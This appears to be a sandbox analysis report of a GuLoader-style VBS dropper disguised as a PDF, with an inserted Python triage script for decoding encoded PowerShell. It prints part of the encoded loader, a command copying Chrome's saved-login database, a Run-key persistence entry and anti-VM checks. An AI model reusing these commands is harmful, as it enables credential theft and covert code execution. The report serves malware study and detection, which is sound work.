Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBCAGEAYwBvAG4AZwAgAFMAbABlAHQAbgAgAEYARQBKAEwAUABMAEEAIABWAGkAbgBkAGYAbAA0ACAAZgBhAHIAYQAgAGEAcgB0AGUAcgAgAE8AdgBlAHIAYQByAG8AIABDAEkATgBFAE4ARQBHACAARABkAHMAbwBmAHIAZQByADEAIABCAFIASQBUAFQATABFAFAAQQAgAFMAZQBtAGkAYwBvAHIAbwBuACAAQgB1AG4AZABkAHkAcgBlADEAIABVAE4ATQBBAE4AQQBHACAAUgBJAEMATwBDAEgARQBUACAAaABlAG4AcgBlAGcAbgAgAEkAbgBkAGQAZQBsAGkAbgBnAGUAMQAgAFIATwBUAEEAVABJACAATwB2AGUAcgBmAG8AZAByAGUAcwAxACAAUQBVAEkARQBUACAAYQByAGEAYgBhAG4AIABJAE4ARABEACAAdQBiAGUAdABpAG0AZQAgAGEAawB0AGkAdgBpAHMAdAAgAHAAZQByAHQAdQByAGIAZgAgAEoAQQBHAEUAUgBFAE4AIABLAEkATABPAE0ARQBHAEEAIABBAGMAaABvAG4AZAByACAAQgBuAG4AZQAgAEMAbwBuAGcAcgBlAGcAMwAgAEIAUgBBAE4ARABFAE4AIABJAG4AZwBlAG4AaQByAHQAMgAgAFIAZQB2AG8AIABTAGMAaQByACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABIAGEAbgBkAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAEgAYQBuAGQAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAE8ATgBNAEEATABJAEcALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAsAHIAZQBmACAASQBuAHQAMwAyACAASABhAG4AZABsACwAaQBuAHQAIABCAG8AcgBkAHMAawA2ACwAaQBuAHQAIABIAGEAbgBkAGwANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABEAEEAVQBHAEgAVABFAFIALAB1AGkAbgB0ACAAVABhAG4AegBhAG4AaQA1ACwAaQBuAHQAIABoAGEAYQBuACwAaQBuAHQAIABIAGEAbgBkAGwAMAAsAGkAbgB0ACAARgBhAGwAbABhAGMAaQBlAHMANQAsAGkAbgB0ACAAQgBHAEUAUgAsAGkAbgB0ACAAUQB1AGkAbgBxAHUAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAwACwAdQBpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAxACwASQBuAHQAUAB0AHIAIABtAGUAdABhAHQAZQBnAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAAbQBlAHQAYQB0AGUAZwBuADMALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABtAGUAdABhAHQAZQBnAG4ANQAsAGkAbgB0ACAAbQBlAHQAYQB0AGUAZwBuADYALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgA3ACwAaQBuAHQAIABtAGUAdABhAHQAZQBnAG4AOAAsAGkAbgB0ACAAbQBlAHQAYQB0AGUAZwBuADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAVgBlAGoAcgBmAG8AOQAgAGMAbABvAGMAawByAGEAIABMAEkATQBCACAATwB2AGUAcgBtADYAIABIAHkAcABlAHIAIABEAGkAcwBkAGEAaQBuACAAbgBvAG4AYwBvAG4AIAB0AG8AbABkAGEAdAB0AGUAcwAgAFMAdQBsAGMAYQAgAE8AcAByAGUAdABoAG8AbAAgAGgAbwBsAG8AY
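The -EncodedCommand argument above is a PowerShell script encoded as UTF-16LE text and then base64; the report shows only the first part of it. Decoding the prefix that survives on this page yields junk comment lines of random dictionary words followed by an Add-Type definition that imports NtAllocateVirtualMemory from ntdll.dll, CreateFileA and ReadFile from kernel32.dll and CallWindowProcW from user32.dll, which is consistent with the classic GuLoader pattern of reading a shellcode file (here the file written by the VBS stage) into freshly allocated memory and jumping into it through a window-procedure callback. The Python below is an added example, not something from the Joe Sandbox report: it decodes such a blob, tolerating the truncation a sandbox report introduces, strips the junk comments and lists the DllImport declarations so the APIs stand out at triage time. The embedded script is constructed to mirror the shape of the one on this page; it is not the page's decoded payload, and the LOADER_APIS set and verdict rule are assumptions.

```python
import base64
import re
from typing import Dict, List, Tuple

# Constructed sample: a PowerShell stage in the same shape as the one on the page (junk
# comment words, then Add-Type with P/Invoke declarations). Not the page's decoded payload.
SAMPLE_SCRIPT = """#Bacong Sletn FEJLPLA Vindfl4 fara arter
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class Handl1
{
[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Handl6,ref Int32 NONMALIG,int metategn,ref Int32 Handl,int Bordsk6,int Handl7);
[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string DAUGHTER,uint Tanzani5,int haan,int Handl0,int Fallacies5,int BGER,int Quinque7);
[DllImport("kernel32.dll")]public static extern int ReadFile(int metategn0,uint metategn1,IntPtr metategn2,ref Int32 metategn3,int metategn4);
[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr metategn5,int metategn6,int metategn7,int metategn8,int metategn9);
}
"@
#Vejrfo9 clockra LIMB Overm6
"""

# Assumption: APIs whose presence in an Add-Type stub marks an in-memory loader.
LOADER_APIS = {"NtAllocateVirtualMemory", "VirtualAlloc", "VirtualAllocEx",
               "NtProtectVirtualMemory", "VirtualProtect", "WriteProcessMemory",
               "CreateThread", "NtCreateThreadEx", "CallWindowProcW", "CallWindowProcA",
               "EnumWindows", "CreateFileA", "CreateFileW", "ReadFile"}

DLLIMPORT_RE = re.compile(
    r'\[DllImport\("([^"]+)"\)\]\s*public\s+static\s+extern\s+\S+\s+(\w+)\s*\(')


def encode_command(script: str) -> str:
    """Build the -EncodedCommand form: UTF-16LE text, base64 (used here for the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Decode a -EncodedCommand blob, including one cut off mid-way as in a sandbox
    report: whitespace from line wrapping is removed, a dangling base64 character is
    dropped, padding is restored and an odd trailing byte is discarded."""
    blob = re.sub(r"\s+", "", blob)
    if len(blob) % 4 == 1:
        blob = blob[:-1]
    blob += "=" * (-len(blob) % 4)
    raw = base64.b64decode(blob, validate=False)
    if len(raw) % 2:
        raw = raw[:-1]
    return raw.decode("utf-16-le", errors="replace")


def extract_pinvoke(script: str) -> List[Tuple[str, str]]:
    """Return (dll, function) pairs for every DllImport declaration, in source order."""
    return [(dll.lower(), fn) for dll, fn in DLLIMPORT_RE.findall(script)]


def strip_junk_comments(script: str) -> str:
    """Drop '#' comment lines; GuLoader pads them with random words to vary the hash."""
    return "\n".join(l for l in script.splitlines() if not l.lstrip().startswith("#"))


def triage(blob: str) -> Dict[str, object]:
    script = decode_command(blob)
    imports = extract_pinvoke(script)
    hits = sorted({fn for _, fn in imports if fn in LOADER_APIS})
    # Assumption: allocate + callback-based execution, or three loader APIs, is enough.
    loader = {"NtAllocateVirtualMemory", "CallWindowProcW"} <= set(hits) or len(hits) >= 3
    return {"clean_script": strip_junk_comments(script), "imports": imports,
            "loader_apis": hits, "verdict": "in-memory loader" if loader else "review"}


if __name__ == "__main__":
    result = triage(encode_command(SAMPLE_SCRIPT))
    for dll, fn in result["imports"]:
        print(f"{dll:14} {fn}")
    print("verdict:", result["verdict"])
```

On a real report, pass the base64 string copied from the command line straight to triage(); the decoder handles the line wrapping and truncation seen above, so the declarations that survive in the visible prefix are still recovered.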
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lmt3yvf4\lmt3yvf4.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES843C.tmp" "c:\Users\user\AppData\Local\Temp\lmt3yvf4\CSC3B7445246D634A3891EBDF5913136B1.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: unknown Process created: C:\Windows\System32\smartscreen.exe C:\Windows\System32\smartscreen.exe -Embedding
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lmt3yvf4\lmt3yvf4.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES843C.tmp" "c:\Users\user\AppData\Local\Temp\lmt3yvf4\CSC3B7445246D634A3891EBDF5913136B1.TMP" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe" Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220121 Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\myste.dat Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winVBS@20/16@2/1
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\System32\smartscreen.exe Mutant created: \Sessions\1\BaseNamedObjects\Microsoft-Windows-Safety-SmartScreen
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5464:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1692:120:WilError_01
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Wire-84844663637346665.PDF.vbs"
Source: C:\Windows\SysWOW64\help.exe File written: C:\Users\user\AppData\Roaming\N6AQ8R9T\N6Alogri.ini
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\explorer.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\help.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Binary string: ieinstal.pdbGCTL source: explorer.exe, 00000021.00000000.897631376.000000000834F000.00000004.00020000.sdmp
Source: Binary string: ieinstal.pdb source: explorer.exe, 00000021.00000000.897631376.000000000834F000.00000004.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000018.00000002.782255727.000000001EAF0000.00000040.00000001.sdmp, ieinstal.exe, 00000018.00000002.782669035.000000001EC0F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000018.00000002.782255727.000000001EAF0000.00000040.00000001.sdmp, ieinstal.exe, 00000018.00000002.782669035.000000001EC0F000.00000040.00000001.sdmp
Source: Binary string: help.pdbGCTL source: ieinstal.exe, 00000018.00000002.778101079.000000000309C000.00000004.00000020.sdmp, ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp, ieinstal.exe, 00000018.00000002.777312108.00000000028D0000.00000040.00020000.sdmp
Source: Binary string: help.pdb source: ieinstal.exe, 00000018.00000002.778101079.000000000309C000.00000004.00000020.sdmp, ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp, ieinstal.exe, 00000018.00000002.777312108.00000000028D0000.00000040.00020000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("C:\Windows\SysWOW64\WindowsPowerShell\v", " -EncodedCommand "IwBCAGEAYwBvAG4AZwAgA", "", "", "0")
Source: Yara match File source: 00000018.00000000.651802861.0000000002C00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.728781659.00000000094A0000.00000040.00000001.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_07896930 push es; ret 17_2_07896940
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB6D0D1 push ecx; ret 24_2_1EB6D0E4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lmt3yvf4\lmt3yvf4.cmdline

Persistence and Installation Behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\lmt3yvf4\lmt3yvf4.dll
Source: C:\Windows\SysWOW64\help.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run C6QLL45HGVE

Hooking and other Techniques for Hiding and Protection

Source: Possible double extension: pdf.vbs Static PE information: Wire-84844663637346665.PDF.vbs
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Initial file Initial file: For i = 1 To len(h) step 2 if i mod 21 = 0 then Wscript.Sleep(1)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\qga\qga.exe
Source: powershell.exe, 00000011.00000002.728647487.00000000090D0000.00000004.00000001.sdmp Binary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=PROGRAMFILES=\INTERNET EXPLORER\IEINSTAL.EXEWINDIR=\SYSWOW64\MSHTML.TLB
Source: powershell.exe, 00000011.00000002.728647487.00000000090D0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 0000000000119904 second address: 000000000011990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 0000000000119B6E second address: 0000000000119B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6260 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\help.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lmt3yvf4\lmt3yvf4.dll
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB46A60 rdtscp 24_2_1EB46A60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3319
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1404
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe API coverage: 5.9 %
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: ModuleInformation
Source: powershell.exe, 00000011.00000002.720651917.000000000504A000.00000004.00000001.sdmp Binary or memory string: Hyper-V
Source: explorer.exe, 00000019.00000000.729141257.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000019.00000000.707314759.00000000083E0000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000021.00000000.859197803.00000000011D8000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<
Source: powershell.exe, 00000011.00000002.728830952.000000000A5AA000.00000004.00000001.sdmp, ieinstal.exe, 00000018.00000002.778562700.000000000495A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: explorer.exe, 00000021.00000000.890892741.0000000007138000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000011.00000002.728830952.000000000A5AA000.00000004.00000001.sdmp, ieinstal.exe, 00000018.00000002.778562700.000000000495A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: explorer.exe, 00000019.00000000.721697637.0000000006416000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000011.00000002.728647487.00000000090D0000.00000004.00000001.sdmp Binary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=ProgramFiles=\internet explorer\ieinstal.exewindir=\syswow64\mshtml.tlb
Source: powershell.exe, 00000011.00000002.728830952.000000000A5AA000.00000004.00000001.sdmp, ieinstal.exe, 00000018.00000002.778562700.000000000495A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: ieinstal.exe, 00000018.00000003.695578937.0000000003077000.00000004.00000001.sdmp, ieinstal.exe, 00000018.00000003.695357572.0000000003083000.00000004.00000001.sdmp, ieinstal.exe, 00000018.00000002.777998962.0000000003077000.00000004.00000020.sdmp, ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp, ieinstal.exe, 00000018.00000002.778047822.0000000003083000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000021.00000000.888412818.0000000007026000.00000004.00000001.sdmp Binary or memory string: k\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000011.00000002.728647487.00000000090D0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: powershell.exe, 00000011.00000002.718935785.0000000004AE7000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.720651917.000000000504A000.00000004.00000001.sdmp Binary or memory string: m:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: powershell.exe, 00000011.00000002.728830952.000000000A5AA000.00000004.00000001.sdmp, ieinstal.exe, 00000018.00000002.778562700.000000000495A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: explorer.exe, 00000021.00000000.889355207.00000000070BB000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000px
Source: smartscreen.exe, 00000025.00000002.887372203.0000026134F28000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000011.00000002.728830952.000000000A5AA000.00000004.00000001.sdmp, ieinstal.exe, 00000018.00000002.778562700.000000000495A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: ieinstal.exe, 00000018.00000002.778562700.000000000495A000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: explorer.exe, 00000019.00000000.707314759.00000000083E0000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000021.00000000.888412818.0000000007026000.00000004.00000001.sdmp Binary or memory string: k\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}esS
Source: powershell.exe, 00000011.00000002.728830952.000000000A5AA000.00000004.00000001.sdmp, ieinstal.exe, 00000018.00000002.778562700.000000000495A000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: explorer.exe, 00000019.00000000.747895026.00000000082E2000.00000004.00000001.sdmp Binary or memory string: Prod_VMware_SATA+
Source: ieinstal.exe, 00000018.00000002.778562700.000000000495A000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: explorer.exe, 00000019.00000000.747895026.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: powershell.exe, 00000011.00000002.728830952.000000000A5AA000.00000004.00000001.sdmp, ieinstal.exe, 00000018.00000002.778562700.000000000495A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000011.00000002.728830952.000000000A5AA000.00000004.00000001.sdmp, ieinstal.exe, 00000018.00000002.778562700.000000000495A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: explorer.exe, 00000019.00000000.747895026.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
